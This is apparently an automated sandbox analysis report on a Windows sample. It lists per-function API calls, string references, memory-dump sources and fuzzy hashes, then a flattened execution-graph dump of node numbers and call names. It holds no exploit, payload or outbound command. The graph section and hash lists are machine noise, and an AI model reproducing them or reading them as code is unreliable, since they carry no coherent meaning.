                                                                                                                                                                                                                                                                                        • Part of subcall function 00406EFE: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406F22
                                                                                                                                                                                                                                                                                      • lstrcpynW.KERNEL32(?,?,00000009), ref: 00407265
                                                                                                                                                                                                                                                                                      • lstrcmpW.KERNEL32(?,Version ), ref: 00407276
                                                                                                                                                                                                                                                                                      • lstrcpynW.KERNEL32(?,?,?), ref: 0040728D
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2026613977.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: lstrcpyn$CreateFilelstrcmp
                                                                                                                                                                                                                                                                                      • String ID: Version
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • DestroyWindow.USER32(00000000,00000000,0040372F,00000001,?,?,?,00000000,00403A73,?), ref: 004032E5
                                                                                                                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 00403303
                                                                                                                                                                                                                                                                                      • CreateDialogParamW.USER32(0000006F,00000000,0040324C,00000000), ref: 00403320
                                                                                                                                                                                                                                                                                      • ShowWindow.USER32(00000000,00000005,?,?,?,00000000,00403A73,?), ref: 0040332E
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2026613977.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026594899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026630695.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026783301.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_JA7cOAGHym.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 2102729457-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 20fc2252fa4e8cade60f22cfb8dff2eb59aca0eba7377cdae62c8c9885b14618
                                                                                                                                                                                                                                                                                      • Instruction ID: 7080548a0c715e844c944b711630a30770084a0de0adb1936a850f0acfbe0ad2
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 20fc2252fa4e8cade60f22cfb8dff2eb59aca0eba7377cdae62c8c9885b14618
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 76F05E30541220BBC620AF24FD89AAF7F68B705B1274008BAF405B11A6C7384D92CFDC
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GlobalAlloc.KERNEL32(00000040,00002004,00000000,?,?,00402449,?,?,?,00000008,00000001,000000F0), ref: 0040639C
                                                                                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00002004,00000000,00000000,?,?,00402449,?,?,?,00000008,00000001), ref: 004063B2
                                                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(?,00000000), ref: 004063C1
                                                                                                                                                                                                                                                                                      • GlobalFree.KERNEL32(00000000), ref: 004063CA
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2026613977.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_JA7cOAGHym.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Global$AddressAllocByteCharFreeMultiProcWide
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 2883127279-0
                                                                                                                                                                                                                                                                                      • Opcode ID: cfe0beae58ad61bea83a9ac8add919dc7b7c61ebe1ef4fe2e37f024ea1666988
                                                                                                                                                                                                                                                                                      • Instruction ID: 23858f5f5f858bd20c6f81bae205610dc5c3869b82bfcacec746ad73dc06cfd6
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: cfe0beae58ad61bea83a9ac8add919dc7b7c61ebe1ef4fe2e37f024ea1666988
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 82E092313001117BF2101B269D8CD677EACDBCA7B2B05013AF645E11E1C6308C10C674
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • IsWindowVisible.USER32(?), ref: 0040492E
                                                                                                                                                                                                                                                                                      • CallWindowProcW.USER32(?,00000200,?,?), ref: 0040499C
                                                                                                                                                                                                                                                                                        • Part of subcall function 00403DDB: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2026613977.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_JA7cOAGHym.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Window$CallMessageProcSendVisible
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 3748168415-3916222277
                                                                                                                                                                                                                                                                                      • Opcode ID: c170883d227fca0112a12e156e2c8e9ea80fa6a38e1ecce58c6b14ca94f7736c
                                                                                                                                                                                                                                                                                      • Instruction ID: 3c1fd1ddb59456d7d2ea24cd553691e7f5dd8d926ac1a383129e0726a186868e
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c170883d227fca0112a12e156e2c8e9ea80fa6a38e1ecce58c6b14ca94f7736c
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CE118FF1500209ABDF115F65DC44EAB776CAF84365F00803BFA04761A2C37D8D919FA9
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetPrivateProfileStringW.KERNEL32(00000000,00000000,?,?,00002003,00000000), ref: 004027CD
                                                                                                                                                                                                                                                                                      • lstrcmpW.KERNEL32(?,?,?,00002003,00000000,000000DD,00000012,00000001), ref: 004027D8
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2026613977.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_JA7cOAGHym.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: PrivateProfileStringlstrcmp
                                                                                                                                                                                                                                                                                      • String ID: !N~
                                                                                                                                                                                                                                                                                      • API String ID: 623250636-529124213
                                                                                                                                                                                                                                                                                      • Opcode ID: 07e0e1e700d966a463b53d73ca6f39700f71f89c173b529fa76a4fed3a8722df
                                                                                                                                                                                                                                                                                      • Instruction ID: 1025b72e91f13a3121db677028adcce723ab2f3f19a12cbdb86f5280e69f3e4e
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 07e0e1e700d966a463b53d73ca6f39700f71f89c173b529fa76a4fed3a8722df
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 14E0C0716002086AEB01ABA1DD89DAE7BACAB45304F144426F601F71E3E6745D028714
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00461DD0,Error launching installer), ref: 00405C90
                                                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 00405C9D
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      • Error launching installer, xrefs: 00405C74
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2026613977.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026594899.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026630695.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026783301.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_JA7cOAGHym.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: CloseCreateHandleProcess
                                                                                                                                                                                                                                                                                      • String ID: Error launching installer
                                                                                                                                                                                                                                                                                      • API String ID: 3712363035-66219284
                                                                                                                                                                                                                                                                                      • Opcode ID: d7e07479a26add6e139fb42e4e519ed4ce81f94bdda572b5be1add7e8fe8fde5
                                                                                                                                                                                                                                                                                      • Instruction ID: 058e85fc593d498414a6a643ff83d14e048665682532f700ab3f6144ed6d8858
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d7e07479a26add6e139fb42e4e519ed4ce81f94bdda572b5be1add7e8fe8fde5
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A4E0ECB0900209AFEB009F65DD09E7B7BBCEB00384F084426AD10E2161E778D8148B69
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                      • wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                                        • Part of subcall function 00406113: CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,00406300,00000000), ref: 0040612A
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2026613977.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026594899.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026630695.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026783301.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_JA7cOAGHym.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: CloseHandlelstrlenwvsprintf
                                                                                                                                                                                                                                                                                      • String ID: RMDir: RemoveDirectory invalid input("")
                                                                                                                                                                                                                                                                                      • API String ID: 3509786178-2769509956
                                                                                                                                                                                                                                                                                      • Opcode ID: db8d081d013b9790c932ab277b4a3a99312fd955ab88a80e97be1a4fe9473cae
                                                                                                                                                                                                                                                                                      • Instruction ID: 2c5812d3804eb93f93713fa8b891b4ce654538dc852139f9e16b4ff69120e8c2
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: db8d081d013b9790c932ab277b4a3a99312fd955ab88a80e97be1a4fe9473cae
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 93D05E34A50206BADA009FE1FE29E597764AB84304F400869F005890B1EA74C4108B0E
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BFF,00000000,[Rename]), ref: 00405DF2
                                                                                                                                                                                                                                                                                      • lstrcmpiA.KERNEL32(?,?), ref: 00405E0A
                                                                                                                                                                                                                                                                                      • CharNextA.USER32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E1B
                                                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E24
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2026613977.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026594899.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026630695.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026783301.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_JA7cOAGHym.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: lstrlen$CharNextlstrcmpi
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 190613189-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 6101864ab16567e6bb9a2a5d9c8424f3785a5e6dd51bc724eb4dc87483e37eb4
                                                                                                                                                                                                                                                                                      • Instruction ID: 6c750b41c95b6ea6b2c0dd9449a28e86abc919c298eb75f697d1220529daba74
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6101864ab16567e6bb9a2a5d9c8424f3785a5e6dd51bc724eb4dc87483e37eb4
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 95F0CD31205558FFCB019FA9DC0499FBBA8EF5A350B2544AAE840E7321D234DE019BA4

                                                                                                                                                                                                                                                                                      Execution Graph

                                                                                                                                                                                                                                                                                      Execution Coverage:3.3%
                                                                                                                                                                                                                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                                                      Signature Coverage:3.6%
                                                                                                                                                                                                                                                                                      Total number of Nodes:2000
                                                                                                                                                                                                                                                                                      Total number of Limit Nodes:58
105057->105060 105059 b5311 105059->104998 105060->105059 105061->105003 105062->105005 105064 9bf73 8 API calls 105063->105064 105065 94fef 105064->105065 105169 963d7 105065->105169 105067 9500d 105068 9bd57 8 API calls 105067->105068 105069 95021 105068->105069 105070 9bed9 8 API calls 105069->105070 105071 9502c 105070->105071 105072 9893c 8 API calls 105071->105072 105073 95038 105072->105073 105074 9b329 8 API calls 105073->105074 105075 95045 105074->105075 105076 9be2d 39 API calls 105075->105076 105077 95055 105076->105077 105078 9b329 8 API calls 105077->105078 105079 9507b 105078->105079 105080 9be2d 39 API calls 105079->105080 105081 9508a 105080->105081 105082 9bf73 8 API calls 105081->105082 105083 950a8 105082->105083 105183 951ca 105083->105183 105086 b4d98 40 API calls 105087 950c2 105086->105087 105088 950cc 105087->105088 105089 d4b23 105087->105089 105091 b4d98 40 API calls 105088->105091 105090 951ca 8 API calls 105089->105090 105092 d4b37 105090->105092 105093 950d7 105091->105093 105095 951ca 8 API calls 105092->105095 105093->105092 105094 950e1 105093->105094 105096 b4d98 40 API calls 105094->105096 105097 d4b53 105095->105097 105098 950ec 105096->105098 105101 95594 10 API calls 105097->105101 105098->105097 105099 950f6 105098->105099 105100 b4d98 40 API calls 105099->105100 105102 95101 105100->105102 105103 d4b76 105101->105103 105104 9510b 105102->105104 105105 d4b9f 105102->105105 105106 951ca 8 API calls 105103->105106 105107 9512e 105104->105107 105110 9bed9 8 API calls 105104->105110 105108 951ca 8 API calls 105105->105108 105109 d4b82 105106->105109 105112 d4bda 105107->105112 105116 97e12 8 API calls 105107->105116 105111 d4bbd 105108->105111 105113 9bed9 8 API calls 105109->105113 105114 95121 105110->105114 105115 9bed9 8 API calls 105111->105115 105117 d4b90 105113->105117 105119 951ca 8 API calls 105114->105119 105120 d4bcb 105115->105120 105121 9513e 105116->105121 105118 951ca 8 API calls 105117->105118 105118->105105 
105119->105107 105122 951ca 8 API calls 105120->105122 105123 98470 8 API calls 105121->105123 105122->105112 105124 9514c 105123->105124 105125 98a60 8 API calls 105124->105125 105128 95167 105125->105128 105126 9893c 8 API calls 105126->105128 105127 98a60 8 API calls 105127->105128 105128->105126 105128->105127 105129 951ab 105128->105129 105130 951ca 8 API calls 105128->105130 105129->105012 105130->105128 105132 93aa2 __wsopen_s 105131->105132 105133 93abb 105132->105133 105134 d40da ___scrt_fastfail 105132->105134 105135 95851 9 API calls 105133->105135 105137 d40f6 GetOpenFileNameW 105134->105137 105136 93ac4 105135->105136 105189 93a57 105136->105189 105138 d4145 105137->105138 105140 98577 8 API calls 105138->105140 105142 d415a 105140->105142 105142->105142 105144 93ad9 105207 962d5 105144->105207 105824 93624 7 API calls 105163->105824 105165 9347a 105166 935b3 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 105165->105166 105166->105034 105167->105023 105168->105030 105170 963e4 __wsopen_s 105169->105170 105171 98577 8 API calls 105170->105171 105172 96416 105170->105172 105171->105172 105173 9655e 8 API calls 105172->105173 105180 9644c 105172->105180 105173->105172 105174 9b329 8 API calls 105175 96543 105174->105175 105177 96a7c 8 API calls 105175->105177 105176 9b329 8 API calls 105176->105180 105178 9654f 105177->105178 105178->105067 105179 96a7c 8 API calls 105179->105180 105180->105176 105180->105179 105181 9651a 105180->105181 105182 9655e 8 API calls 105180->105182 105181->105174 105181->105178 105182->105180 105184 951f2 105183->105184 105185 951d4 105183->105185 105187 98577 8 API calls 105184->105187 105186 950b4 105185->105186 105188 9bed9 8 API calls 105185->105188 105186->105086 105187->105186 105188->105186 105190 d22d0 __wsopen_s 105189->105190 105191 93a64 GetLongPathNameW 105190->105191 105192 98577 8 API calls 105191->105192 105193 93a8c 105192->105193 105194 953f2 105193->105194 105195 9bf73 8 API calls 105194->105195 105196 
95404 105195->105196 105197 95851 9 API calls 105196->105197 105198 9540f 105197->105198 105199 9541a 105198->105199 105200 d4d5b 105198->105200 105201 96a7c 8 API calls 105199->105201 105205 d4d7d 105200->105205 105243 ae36b 41 API calls 105200->105243 105203 95426 105201->105203 105237 91340 105203->105237 105206 95439 105206->105144 105244 96679 105207->105244 105238 91352 105237->105238 105242 91371 __fread_nolock 105237->105242 105241 b017b 8 API calls 105238->105241 105239 b014b 8 API calls 105240 91388 105239->105240 105240->105206 105241->105242 105242->105239 105243->105200 105423 9663e LoadLibraryA 105244->105423 105249 d5648 105252 966e7 68 API calls 105249->105252 105250 966a4 LoadLibraryExW 105431 96607 LoadLibraryA 105250->105431 105254 d564f 105252->105254 105256 96607 3 API calls 105254->105256 105258 d5657 105256->105258 105452 9684a 105258->105452 105424 96674 105423->105424 105425 96656 GetProcAddress 105423->105425 105428 be95b 105424->105428 105426 96666 105425->105426 105426->105424 105427 9666d FreeLibrary 105426->105427 105427->105424 105460 be89a 105428->105460 105430 96698 105430->105249 105430->105250 105432 9663b 105431->105432 105433 9661c GetProcAddress 105431->105433 105436 96720 105432->105436 105434 9662c 105433->105434 105434->105432 105435 96634 FreeLibrary 105434->105435 105435->105432 105437 b017b 8 API calls 105436->105437 105438 96735 105437->105438 105439 9423c 8 API calls 105438->105439 105440 96741 __fread_nolock 105439->105440 105441 d56c2 105440->105441 105445 9677c 105440->105445 105517 103a0e CreateStreamOnHGlobal FindResourceExW LoadResource SizeofResource LockResource 105440->105517 105518 103a92 74 API calls 105441->105518 105444 9684a 40 API calls 105444->105445 105445->105444 105453 9685c 105452->105453 105454 d5760 105452->105454 105550 bec34 105453->105550 105462 be8a6 CallCatchBlock 105460->105462 105461 be8b4 105485 bf649 20 API calls __dosmaperr 105461->105485 105462->105461 105464 be8e4 105462->105464 105466 
be8e9 105464->105466 105467 be8f6 105464->105467 105465 be8b9 105486 c2b5c 26 API calls pre_c_initialization 105465->105486 105487 bf649 20 API calls __dosmaperr 105466->105487 105477 c83e1 105467->105477 105471 be8c4 __fread_nolock 105471->105430 105472 be8ff 105473 be912 105472->105473 105474 be905 105472->105474 105478 c83ed CallCatchBlock 105477->105478 105490 c32d1 EnterCriticalSection 105478->105490 105480 c83fb 105491 c847b 105480->105491 105484 c842c __fread_nolock 105484->105472 105485->105465 105486->105471 105487->105471 105490->105480 105498 c849e 105491->105498 105492 c84f7 105493 c4ff0 __dosmaperr 20 API calls 105492->105493 105494 c8500 105493->105494 105496 c2d38 _free 20 API calls 105494->105496 105497 c8509 105496->105497 105503 c8408 105497->105503 105509 c3778 11 API calls 2 library calls 105497->105509 105498->105492 105498->105498 105498->105503 105507 b94fd EnterCriticalSection 105498->105507 105508 b9511 LeaveCriticalSection 105498->105508 105504 c8437 105503->105504 105511 c3319 LeaveCriticalSection 105504->105511 105506 c843e 105506->105484 105507->105498 105508->105498 105511->105506 105517->105441 105518->105445 105553 bec51 105550->105553 105554 bec5d CallCatchBlock 105553->105554 105824->105165 103107 e400f 103123 9eeb0 messages 103107->103123 103108 9f211 PeekMessageW 103108->103123 103109 9ef07 GetInputState 103109->103108 103109->103123 103111 e32cd TranslateAcceleratorW 103111->103123 103112 9f28f PeekMessageW 103112->103123 103113 9f104 timeGetTime 103113->103123 103114 9f273 TranslateMessage DispatchMessageW 103114->103112 103115 9f2af Sleep 103115->103123 103116 e4183 Sleep 103128 e4060 103116->103128 103118 e33e9 timeGetTime 103263 aaa65 9 API calls 103118->103263 103122 e421a GetExitCodeProcess 103125 e4246 CloseHandle 103122->103125 103126 e4230 WaitForSingleObject 103122->103126 103123->103108 103123->103109 103123->103111 103123->103112 103123->103113 103123->103114 103123->103115 103123->103116 103123->103118 
103123->103128 103129 9f0d5 103123->103129 103139 9f450 103123->103139 103146 9f6d0 103123->103146 103169 a2b20 103123->103169 103234 ae915 103123->103234 103239 a0340 103123->103239 103262 af215 timeGetTime 103123->103262 103264 10446f 8 API calls 103123->103264 103265 103fe1 81 API calls __wsopen_s 103123->103265 103124 12345b GetForegroundWindow 103124->103128 103125->103128 103126->103123 103126->103125 103128->103122 103128->103123 103128->103124 103130 e3d51 103128->103130 103131 e42b8 Sleep 103128->103131 103266 1160b5 8 API calls 103128->103266 103267 ff292 QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 103128->103267 103268 af215 timeGetTime 103128->103268 103269 fdd87 CreateToolhelp32Snapshot Process32FirstW 103128->103269 103130->103129 103131->103123 103140 9f46f 103139->103140 103141 9f483 103139->103141 103279 9e960 103140->103279 103311 103fe1 81 API calls __wsopen_s 103141->103311 103144 9f47a 103144->103123 103145 e4584 103145->103145 103147 9f6ef 103146->103147 103164 9f7dc messages 103147->103164 103360 b05b2 5 API calls __Init_thread_wait 103147->103360 103150 e45d9 103150->103164 103361 9bf73 103150->103361 103151 9bf73 8 API calls 103151->103164 103158 e45fd 103367 b0568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 103158->103367 103159 a0340 224 API calls 103159->103164 103163 a1ca0 8 API calls 103163->103164 103164->103151 103164->103159 103164->103163 103165 9fae1 103164->103165 103167 103fe1 81 API calls 103164->103167 103351 9bed9 103164->103351 103355 9be2d 103164->103355 103359 ab35c 224 API calls 103164->103359 103368 b05b2 5 API calls __Init_thread_wait 103164->103368 103369 b0413 29 API calls __onexit 103164->103369 103370 b0568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 103164->103370 103371 115231 101 API calls 103164->103371 103372 11731e 224 API calls 103164->103372 103165->103123 103167->103164 103170 a2b61 103169->103170 103171 a2fc0 103170->103171 
103172 a2b86 103170->103172 103647 b05b2 5 API calls __Init_thread_wait 103171->103647 103174 e7bd8 103172->103174 103175 a2ba0 103172->103175 103610 117af9 103174->103610 103403 a3160 103175->103403 103176 a2fca 103186 a300b 103176->103186 103648 9b329 103176->103648 103180 a3160 9 API calls 103183 a2bc6 103180->103183 103181 e7be4 103181->103123 103185 a2bfc 103183->103185 103183->103186 103184 e7bed 103184->103123 103187 e7bfd 103185->103187 103192 a2c18 __fread_nolock 103185->103192 103186->103184 103655 9b4c8 8 API calls 103186->103655 103658 103fe1 81 API calls __wsopen_s 103187->103658 103190 a3049 103656 ae6e8 224 API calls 103190->103656 103191 a2fe4 103654 b0568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 103191->103654 103192->103190 103195 e7c15 103192->103195 103201 b014b 8 API calls 103192->103201 103203 b017b 8 API calls 103192->103203 103209 a0340 224 API calls 103192->103209 103210 a2d3f 103192->103210 103211 e7c59 103192->103211 103214 e7c10 103192->103214 103659 103fe1 81 API calls __wsopen_s 103195->103659 103197 e7c78 103661 1161a2 53 API calls _wcslen 103197->103661 103198 a2d4c 103199 a3160 9 API calls 103198->103199 103205 a2d59 103199->103205 103201->103192 103202 a3082 103657 afe39 8 API calls 103202->103657 103203->103192 103204 e7da1 103204->103214 103662 103fe1 81 API calls __wsopen_s 103204->103662 103205->103204 103206 a3160 9 API calls 103205->103206 103212 a2d73 103206->103212 103209->103192 103210->103197 103210->103198 103660 103fe1 81 API calls __wsopen_s 103211->103660 103212->103204 103215 9bed9 8 API calls 103212->103215 103217 a2dd7 messages 103212->103217 103214->103123 103215->103217 103216 a3160 9 API calls 103216->103217 103217->103202 103217->103204 103217->103214 103217->103216 103219 a2e8b messages 103217->103219 103413 aac3e 103217->103413 103432 11a9ac 103217->103432 103440 11ab3f 103217->103440 103462 10f94a 103217->103462 103471 119fe8 103217->103471 103474 11a6aa 103217->103474 103482 10664c 
